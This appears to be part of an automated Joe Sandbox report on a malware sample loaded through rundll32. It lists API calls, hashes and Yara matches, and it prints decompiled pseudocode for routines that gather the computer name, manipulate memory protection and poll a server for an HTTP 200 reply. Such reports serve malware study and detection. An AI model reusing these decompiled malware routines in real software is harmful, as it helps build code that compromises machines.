                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                            • String ID:
                            • API String ID: 552344955-0
                            • Opcode ID: 47ab430de0c7cba5968f121853327274be1f06cd50d4adb925162af0b855f288
                            • Instruction ID: bd34eb8f2ffd3eefedd057102bba532970ebae65b4d2ffaf1efa8441a46f771a
                            • Opcode Fuzzy Hash: 47ab430de0c7cba5968f121853327274be1f06cd50d4adb925162af0b855f288
                            • Instruction Fuzzy Hash: 3F116971D00209BBDB11DFA9CC54F9EBBB8EF45754F20405AE90097250E778EA07DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04F702F2,69B25F44,?,?,00000000), ref: 04F793AD
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F702F2), ref: 04F7940E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileFreeHeapSystem
                            • String ID:
                            • API String ID: 892271797-0
                            • Opcode ID: 7ae723e30f24f3612327898f76864d271fb8a2c0dff8e47146f685c27697339e
                            • Instruction ID: 28167de8e5d5e4edc373f8502d1ae83da3a9cc16fa1525d90f1ac835202d9fe3
                            • Opcode Fuzzy Hash: 7ae723e30f24f3612327898f76864d271fb8a2c0dff8e47146f685c27697339e
                            • Instruction Fuzzy Hash: 7211DAB5D0010CFBEB11DBA4E944EAE77BCEB08305F1040ABE901EA150D778AB45DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04A11267
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SafeArrayDestroy.OLEAUT32(?), ref: 04A112B7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: fdd4fbc577f703f85a454ef363a4a506cc05654b0adaa745f51119738b9ee0f9
                            • Instruction ID: 3a0cac210b7ec955e5d50488130e5b0cca0c9e628d59aee4ff1cc0df069fecca
                            • Opcode Fuzzy Hash: fdd4fbc577f703f85a454ef363a4a506cc05654b0adaa745f51119738b9ee0f9
                            • Instruction Fuzzy Hash: 27111E75A00209BFEB01DFA8D904EEEB7B9EF18750F018025EA04E7170E775AA15DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A141FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                            				struct _FILETIME _v12;
                            				signed int _t11;
                            				void* _t16;
                            				short _t19;
                            				void* _t22;
                            				void* _t24;
                            				void* _t25;
                            				short* _t26;
                            
                            				_t24 = __edx;
                            				_t25 = E04A161FC(_t11, _a12);
                            				if(_t25 == 0) {
                            					_t22 = 8;
                            				} else {
                            					_t26 = _t25 + _a16 * 2;
                            					 *_t26 = 0; // executed
                            					_t16 = E04A12AE4(__ecx, _a4, _a8, _t25); // executed
                            					_t22 = _t16;
                            					if(_t22 == 0) {
                            						GetSystemTimeAsFileTime( &_v12);
                            						_t19 = 0x5f;
                            						 *_t26 = _t19;
                            						_t22 = E04A14822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                            					}
                            					HeapFree( *0x4a1a2d8, 0, _t25);
                            				}
                            				return _t22;
                            			}

                            Instruction addresses from the decompiler view: 0x04a141fa 0x04a1420b 0x04a1420f 0x04a1426a 0x04a14211 0x04a14218 0x04a14220 0x04a14223 0x04a14228 0x04a1422c 0x04a14232 0x04a1423a 0x04a1423d 0x04a14255 0x04a14255 0x04a14260 0x04a14260 0x04a14271

                            APIs
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,761B5520,00000008,00000014,004F0053,055393F4), ref: 04A14232
                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,761B5520,00000008,00000014,004F0053,055393F4), ref: 04A14260
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 1500278894-0
                            • Opcode ID: 76aed9e7e0a080b70ff86219a44ba6af8e1e32629b43e6fcf82d63e20cb57db5
                            • Instruction ID: 94154fd5047ece6aa76563b6c01b32f07ecdf0fc916ce10b6d738d0c581b1e12
                            • Opcode Fuzzy Hash: 76aed9e7e0a080b70ff86219a44ba6af8e1e32629b43e6fcf82d63e20cb57db5
                            • Instruction Fuzzy Hash: 94018F32200249BBEB215FA8DC44E9B3B7DFF88714F00002AFA009A170DBB1E955D750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(04A17283), ref: 04A1150A
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SysFreeString.OLEAUT32(00000000), ref: 04A1154B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: b0f61ebe1c3508d71731a140e0076f1f846cca444fed7f8073f220b892e5ddda
                            • Instruction ID: 135763e027bddc10f9902a90cee74a76f3c341a49c8e374cbddee5741c55eddb
                            • Opcode Fuzzy Hash: b0f61ebe1c3508d71731a140e0076f1f846cca444fed7f8073f220b892e5ddda
                            • Instruction Fuzzy Hash: 46014B7650010ABFEF419FA8D904DEF7BB8EF4C754B044022FA09E6130E630AE15DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E04A122D7(void* __ecx) {
                            				signed int _v8;
                            				void* _t15;
                            				void* _t19;
                            				void* _t20;
                            				void* _t22;
                            				intOrPtr* _t23;
                            
                            				_t23 = __imp__;
                            				_t20 = 0;
                            				_v8 = _v8 & 0;
                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                            				_t10 = _v8;
                            				if(_v8 != 0) {
                            					_t20 = E04A16D63(_t10 + 1);
                            					if(_t20 != 0) {
                            						_t15 =  *_t23(3, _t20,  &_v8); // executed
                            						if(_t15 != 0) {
                            							 *((char*)(_v8 + _t20)) = 0;
                            						} else {
                            							E04A16C2C(_t20);
                            							_t20 = 0;
                            						}
                            					}
                            				}
                            				return _t20;
                            			}

                            Instruction addresses from the decompiler view: 0x04a122dc 0x04a122e7 0x04a122e9 0x04a122ef 0x04a122f1 0x04a122f6 0x04a122ff 0x04a12303 0x04a1230c 0x04a12310 0x04a1231f 0x04a12312 0x04a12313 0x04a12318 0x04a12318 0x04a12310 0x04a12303 0x04a12328

                            APIs
                            • GetComputerNameExA.KERNEL32(00000003,00000000,04A157B5,00000000,00000000,?,746BC740,04A157B5), ref: 04A122EF
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetComputerNameExA.KERNEL32(00000003,00000000,04A157B5,04A157B6,?,746BC740,04A157B5), ref: 04A1230C
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: f2540a512119e952d8cac916d081f6754a4b2dda5bfb1ce49e4578a2c5caf98d
                            • Instruction ID: 638897180682c49dc18c97d9468e3428d88e9896c20c4212e4af3bbf2c38a1fb
                            • Opcode Fuzzy Hash: f2540a512119e952d8cac916d081f6754a4b2dda5bfb1ce49e4578a2c5caf98d
                            • Instruction Fuzzy Hash: FEF05477A00105BBEB21D7A98D00FEF76FCDBC5650F1100A9E954E3150EAB0EE019772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A178BF(WCHAR* _a4) {
                            				void* __edi;
                            				intOrPtr _t11;
                            				intOrPtr _t14;
                            				void* _t16;
                            				void* _t18;
                            				WCHAR* _t20;
                            
                            				_t20 = E04A16D63(lstrlenW(_a4) + _t7 + 0x5c);
                            				if(_t20 == 0) {
                            					_t18 = 8;
                            				} else {
                            					_t11 =  *0x4a1a348; // 0xb1d5a8
                            					_t5 = _t11 + 0x4a1ba70; // 0x43002f
                            					wsprintfW(_t20, _t5, 5, _a4);
                            					_t14 =  *0x4a1a348; // 0xb1d5a8
                            					_t6 = _t14 + 0x4a1b900; // 0x6d0063
                            					_t16 = E04A17928(0, _t6, _t20, 0); // executed
                            					_t18 = _t16;
                            					E04A16C2C(_t20);
                            				}
                            				return _t18;
                            			}

                            Instruction addresses from the decompiler view: 0x04a178d5 0x04a178d9 0x04a17919 0x04a178db 0x04a178df 0x04a178e6 0x04a178ee 0x04a178f4 0x04a178ff 0x04a17908 0x04a1790e 0x04a17910 0x04a17910 0x04a1791e

                            APIs
                            • lstrlenW.KERNEL32(7620F710,00000000,?,04A171A6,00000000,?,7620F710,00000000,7620F730), ref: 04A178C5
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • wsprintfW.USER32 ref: 04A178EE
                              • Part of subcall function 04A17928: memset.NTDLL ref: 04A1794B
                              • Part of subcall function 04A17928: GetLastError.KERNEL32 ref: 04A17997
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                            • String ID:
                            • API String ID: 1672627171-0
                            • Opcode ID: ffe8627896971dfbc541f18d3431eef544aaa1220e711bf4b67482b0e693ab6d
                            • Instruction ID: 2a16bd918018d02c27feb333bb01e1201c5857b808638cef5a3ce056ce8b6db3
                            • Opcode Fuzzy Hash: ffe8627896971dfbc541f18d3431eef544aaa1220e711bf4b67482b0e693ab6d
                            • Instruction Fuzzy Hash: E5F0B43A602614ABE7119B64DC04F9B37DCEF94725F058412F944C7131D634ED16C765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F7E873
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F7E8AF
                              • Part of subcall function 04F61A0A: lstrlen.KERNEL32(?,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61A58
                              • Part of subcall function 04F61A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A6A
                              • Part of subcall function 04F61A0A: lstrcpy.KERNEL32(00000000,?), ref: 04F61A79
                              • Part of subcall function 04F61A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A8A
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                            • String ID:
                            • API String ID: 1872894792-0
                            • Opcode ID: c4f7c961554bc99835c0e3cf7ead30ee02269ba092af75cb70675e52c49e8b06
                            • Instruction ID: fe77de0278ad81d54a80578d271ae253f15377e45e62c35322d79c09ff53f567
                            • Opcode Fuzzy Hash: c4f7c961554bc99835c0e3cf7ead30ee02269ba092af75cb70675e52c49e8b06
                            • Instruction Fuzzy Hash: C8F0EC35A012169FCB207F18E888C75F758EB8511A311419FED165B310C66EBC53C6D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InterlockedIncrement.KERNEL32(04F8A05C), ref: 04F6C9BE
                              • Part of subcall function 04F72331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F7235C
                              • Part of subcall function 04F72331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04F72369
                              • Part of subcall function 04F72331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04F723F5
                              • Part of subcall function 04F72331: GetModuleHandleA.KERNEL32(00000000), ref: 04F72400
                              • Part of subcall function 04F72331: RtlImageNtHeader.NTDLL(00000000), ref: 04F72409
                              • Part of subcall function 04F72331: RtlExitUserThread.NTDLL(00000000), ref: 04F7241E
                            • InterlockedDecrement.KERNEL32(04F8A05C), ref: 04F6C9E2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                            • String ID:
                            • API String ID: 1011034841-0
                            • Opcode ID: f927db48d7c7adf8b95b6c8233aa2ae552b32cb156b4c977c9ed4f825a005a6f
                            • Instruction ID: b871515374fba071c097457fc8d1957eb9e58bfdff6f9b9fc2a4b0adc59abb2a
                            • Opcode Fuzzy Hash: f927db48d7c7adf8b95b6c8233aa2ae552b32cb156b4c977c9ed4f825a005a6f
                            • Instruction Fuzzy Hash: DFE04873B48166A7DB216E749C48B6E7E50EB01784F00461DF9D7F6050D614F853D7D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A11CD6(signed int __edx, intOrPtr _a4) {
                            				void* _t3;
                            				void* _t5;
                            				void* _t7;
                            				void* _t8;
                            				void* _t9;
                            				signed int _t10;
                            
                            				_t10 = __edx;
                            				_t3 = HeapCreate(0, 0x400000, 0); // executed
                            				 *0x4a1a2d8 = _t3;
                            				if(_t3 == 0) {
                            					_t8 = 8;
                            					return _t8;
                            				}
                            				 *0x4a1a1c8 = GetTickCount();
                            				_t5 = E04A16D78(_a4);
                            				if(_t5 == 0) {
                            					_t5 = E04A14B89(_t9, _a4); // executed
                            					if(_t5 == 0) {
                            						if(E04A16B1C(_t9) != 0) {
                            							 *0x4a1a300 = 1; // executed
                            						}
                            						_t7 = E04A13D2C(_t10); // executed
                            						return _t7;
                            					}
                            				}
                            				return _t5;
                            			}

                            Instruction addresses from the decompiler view: 0x04a11cd6 0x04a11cdf 0x04a11ce5 0x04a11cec 0x04a11cf0 0x00000000 0x04a11cf0 0x04a11cfd 0x04a11d02 0x04a11d09 0x04a11d0f 0x04a11d16 0x04a11d1f 0x04a11d21 0x04a11d21 0x04a11d2b 0x00000000 0x04a11d2b 0x04a11d16 0x04a11d30

                            APIs
                            • HeapCreate.KERNEL32(00000000,00400000,00000000,04A15E54,?), ref: 04A11CDF
                            • GetTickCount.KERNEL32 ref: 04A11CF3
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 3e6091bbfc68f14d893d4ab51041eff1ca2989ad1edb41f9ef7f1d6deeaa1a4f
                            • Instruction ID: 6dbb2ba26ed6b4207049186914db68108e6bc1ad9b0089121b70a07e959aa21e
                            • Opcode Fuzzy Hash: 3e6091bbfc68f14d893d4ab51041eff1ca2989ad1edb41f9ef7f1d6deeaa1a4f
                            • Instruction Fuzzy Hash: 21F092B0754702ABFB112FB0AE05B1A35A8AF28788F104825EE44D40B0EBB9F801D725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7561D
                              • Part of subcall function 04F755E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04F75653
                              • Part of subcall function 04F755E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7565F
                              • Part of subcall function 04F755E4: lstrcmpi.KERNEL32(?,00000000), ref: 04F7569C
                              • Part of subcall function 04F755E4: StrChrA.SHLWAPI(?,0000002E), ref: 04F756A5
                              • Part of subcall function 04F755E4: lstrcmpi.KERNEL32(?,00000000), ref: 04F756B7
                              • Part of subcall function 04F755E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04F75708
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484), ref: 04F81E2C
                              • Part of subcall function 04F7A806: GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                              • Part of subcall function 04F7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484,?,00000318), ref: 04F81EB7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                            • String ID:
                            • API String ID: 4138075514-0
                            • Opcode ID: 94bb39b70cdb0a619839a824f0eba1eacdd95c7dff5eb382a4d2090a9d25e5e4
                            • Instruction ID: 4a66d7217ebb6541ed9c1fb0209182489f51da632e7de3ee1e26075b44fa6c8b
                            • Opcode Fuzzy Hash: 94bb39b70cdb0a619839a824f0eba1eacdd95c7dff5eb382a4d2090a9d25e5e4
                            • Instruction Fuzzy Hash: 3621F771D01229EBDF11EFA5DC84ADEBBB5FF08724F10812AE914BA150D7346942DF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,04F80977,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F818D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 11530f47af07f0a6769826b0813d2947924ab0709c030a4537072462e59fc664
                            • Instruction ID: ae01c9e8fbdf5fdbee4512a534bf688a27da0e3d7f2f2651da1d62d0867cc2dd
                            • Opcode Fuzzy Hash: 11530f47af07f0a6769826b0813d2947924ab0709c030a4537072462e59fc664
                            • Instruction Fuzzy Hash: 513192B1E00108EFDB10EF98E9859ADB7B5FB04224B5481AEE205AF204D774BD43CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E04A11C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                            				signed int _v5;
                            				signed int _v12;
                            				void* _t32;
                            				signed int _t37;
                            				signed int _t39;
                            				signed char _t45;
                            				void* _t49;
                            				char* _t51;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t69;
                            
                            				_v12 = _v12 & 0x00000000;
                            				_t69 = __eax;
                            				_t32 = RtlAllocateHeap( *0x4a1a2d8, 0, __eax << 2); // executed
                            				_t49 = _t32;
                            				if(_t49 == 0) {
                            					_v12 = 8;
                            				} else {
                            					 *_a8 = _t49;
                            					do {
                            						_t45 =  *_a4;
                            						asm("cdq");
                            						_t65 = 0x64;
                            						_t37 = (_t45 & 0x000000ff) / _t65;
                            						_v5 = _t37;
                            						if(_t37 != 0) {
                            							 *_t49 = _t37 + 0x30;
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t37 * 0x9c;
                            						}
                            						asm("cdq");
                            						_t66 = 0xa;
                            						_t39 = (_t45 & 0x000000ff) / _t66;
                            						if(_t39 != 0 || _v5 != _t39) {
                            							 *_t49 = _t39 + 0x30;
                            							_t49 = _t49 + 1;
                            							_t45 = _t45 + _t39 * 0xf6;
                            						}
                            						_a4 = _a4 + 1;
                            						 *_t49 = _t45 + 0x30;
                            						 *(_t49 + 1) = 0x2c;
                            						_t49 = _t49 + 2;
                            						_t69 = _t69 - 1;
                            					} while (_t69 != 0);
                            					_t51 = _t49 - 1;
                            					 *_a12 = _t51 -  *_a8;
                            					 *_t51 = 0;
                            				}
                            				return _v12;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04A11C1B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 20f35250c81e03d0ba11311283ca812d9425ecbe968bf26c19f37cf2702ebd01
                            • Instruction ID: 112ca5289720c8ca545ec7449142b0d974f716495454d766513cbaf4bccaa93b
                            • Opcode Fuzzy Hash: 20f35250c81e03d0ba11311283ca812d9425ecbe968bf26c19f37cf2702ebd01
                            • Instruction Fuzzy Hash: D3113B312453849FEB068F2DD851BE97BA9DF67358F14408EE5409F3A2C277950BC720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(?,04F899DC,-0000000C,?,?,?,04F7C01A,00000006,?,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F64ADA
                              • Part of subcall function 04F674AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04F8A400), ref: 04F674C5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleInformationModuleProcessQuery
                            • String ID:
                            • API String ID: 2776635927-0
                            • Opcode ID: d4db34229c76c9fe4a78f72fcaeeef05fae73bb6e2fc42d2bf7ff0ac68609c77
                            • Instruction ID: 0dcc230e2692673cd7f58bca28a64d9e4e465903106deec8e97f9d06ebca8532
                            • Opcode Fuzzy Hash: d4db34229c76c9fe4a78f72fcaeeef05fae73bb6e2fc42d2bf7ff0ac68609c77
                            • Instruction Fuzzy Hash: BB216072A00205EFDB21EF99CC90A6A77E9EF44398724852DE9468B250D670F943DB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A1375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                            				intOrPtr _v12;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v60;
                            				char _v68;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t14;
                            				signed int* _t16;
                            				signed int _t25;
                            				signed int _t26;
                            				signed int* _t28;
                            				signed int _t30;
                            
                            				_t28 = __ecx;
                            				_t14 =  *0x4a1a368; // 0x5539618
                            				_v12 = _t14;
                            				_t16 = _a12;
                            				_t30 = 8;
                            				if(_t16 != 0) {
                            					 *_t16 =  *_t16 & 0x00000000;
                            				}
                            				do {
                            					_t31 =  &_v68;
                            					if(E04A1227F( &_v68) == 0) {
                            						goto L16;
                            					}
                            					_t30 = E04A16954(_t31, _a4, _v12);
                            					if(_t30 == 0) {
                            						_t25 = E04A11CA5(_t31, _t28); // executed
                            						_t30 = _t25;
                            						if(_t30 != 0) {
                            							if(_t30 == 0x102) {
                            								E04A1A000 = E04A1A000 + 0xea60;
                            							}
                            						} else {
                            							if(_v24 != 0xc8) {
                            								_t30 = 0xe8;
                            							} else {
                            								_t26 = _v20;
                            								if(_t26 == 0) {
                            									_t30 = 0x10d2;
                            								} else {
                            									_t28 = _a8;
                            									if(_t28 != 0) {
                            										_v60 = _v60 & _t30;
                            										 *_t28 = _v60;
                            										_t28 = _a12;
                            										if(_t28 != 0) {
                            											 *_t28 = _t26;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					E04A14274( &_v68, 0x102, _t28, _t30);
                            					L16:
                            				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4a1a30c, 0) == 0x102);
                            				return _t30;
                            			}

                            APIs
